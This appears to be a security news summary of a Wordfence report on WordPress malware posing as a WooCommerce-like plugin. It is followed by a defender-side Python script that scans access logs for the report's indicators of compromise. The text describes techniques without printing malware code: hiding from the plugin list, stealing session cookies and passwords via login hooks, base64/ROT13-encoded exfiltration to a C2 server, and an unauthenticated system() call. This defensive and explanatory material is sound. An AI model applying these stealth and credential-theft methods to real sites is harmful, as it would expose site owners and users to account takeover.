
The Wordfence Threat Intelligence team has uncovered a deceptive and highly persistent WordPress malware variant that disguises itself as a legitimate plugin—complete with a comment header, administrative UI, and multiple layers of obfuscation. Despite its appearance, this malware silently siphons sensitive data, including login cookies and administrator credentials, and enables remote code execution.
“This piece of malware contains code that ensures it remains hidden in the administrator dashboard. It has a password extraction feature… an AJAX-based remote code execution mechanism and unfinished code suggesting it is still in development,” Wordfence explains. The malware was first identified during a site cleanup on April 24, 2025.
The malware lives in its own directory under /wp-content/plugins/ and contains what appears to be a legitimate plugin header, even mimicking known plugins like WooCommerce Product Add-ons:
“We would like to stress that this does not mean the WooCommerce plugin is in any way associated with the malware,” the team notes.
To avoid detection, the malware uses the all_plugins filter to hide itself from the Plugins page in the WordPress admin interface.
The malware is equipped with an exfiltration mechanism that transmits sensitive user data to a Command and Control (C2) server, the URL of which is stored in the WordPress wp_options table.
Using cookies and AJAX actions, the malware gathers:
- WordPress usernames and email addresses
- Session cookies
- IP address and user-agent
- Login credentials (via wp_login and authenticate hooks)
“The cookies can be used to hijack the user’s session and perform actions on their behalf,” the report states. The data is obfuscated with base64 encoding and ROT13 before being sent to the attacker’s server, to evade detection.
The malware also registers a nopriv AJAX action, meaning it can be triggered without authentication:
This decodes and invokes the system() function, executing arbitrary shell commands. A second AJAX endpoint appears incomplete, implying the malware is still under development.
A second plugin discovered during the same site cleanup used slightly different hiding techniques and added:
- JavaScript injection via wp_enqueue_scripts
- A malformed header injection hook
- A glob() call to include server-side cached files
“Perhaps this code was tested locally by a hacker and somehow snuck into this plugin.”
Wordfence recommends checking for the following IoCs:
- Hidden plugin files in /wp-content/plugins/ not visible in the admin UI
- Redirection to external payment gateways
- Presence of the API_SN_CLOUDSERVER option in your database
- Access logs showing the configure_cloudserver parameter
- Presence of the custom_reporter_timer cookie
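As an added, defender-side example (not code from the Wordfence report and not part of the malware), this Python script scans web-server access logs for two of the IoCs listed above: the configure_cloudserver request parameter and the custom_reporter_timer cookie. It assumes a combined log format extended with a trailing quoted Cookie field; the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Indicators quoted from the Wordfence report summarised above.
IOC_QUERY_PARAM = "configure_cloudserver"
IOC_COOKIE = "custom_reporter_timer"

# Apache/nginx "combined" format plus one optional trailing quoted field
# carrying the request's Cookie header (assumed; stock combined has none).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"(?: "(?P<cookie>[^"]*)")?'
)

def parse_line(line):
    """Fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def ioc_hits(rec):
    """IoCs present in one parsed record (empty list when clean)."""
    hits = []
    if IOC_QUERY_PARAM in parse_qs(urlsplit(rec["target"]).query):
        hits.append(f"query parameter {IOC_QUERY_PARAM}")
    cookie_names = {c.split("=", 1)[0].strip()
                    for c in (rec.get("cookie") or "").split(";") if c.strip()}
    if IOC_COOKIE in cookie_names:
        hits.append(f"cookie {IOC_COOKIE}")
    return hits

def scan(lines):
    """(line_no, ip, target, reason) for every IoC match; bad lines skipped."""
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        for reason in (ioc_hits(rec) if rec else []):  # unparseable: skip
            findings.append((n, rec["ip"], rec["target"], reason))
    return findings

# Constructed sample lines (RFC 5737 test addresses, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Apr/2025:10:01:12 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=example_action&configure_cloudserver=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [24/Apr/2025:10:03:30 +0000] "GET /?p=12 HTTP/1.1" 200 4096 '
    '"-" "Mozilla/5.0" "wordpress_test_cookie=WP%20Cookie%20check"',
    '198.51.100.7 - - [24/Apr/2025:10:05:44 +0000] "POST /wp-admin/admin-ajax.php '
    'HTTP/1.1" 200 48 "-" "curl/8.0" "custom_reporter_timer=1; other=x"',
    "this line is not in the expected format",
]
```

Running `scan()` over a real log file (one line per list element) yields the line numbers and client addresses to pivot on; the option-table and hidden-plugin-directory checks from the list above still need to be done on the server itself.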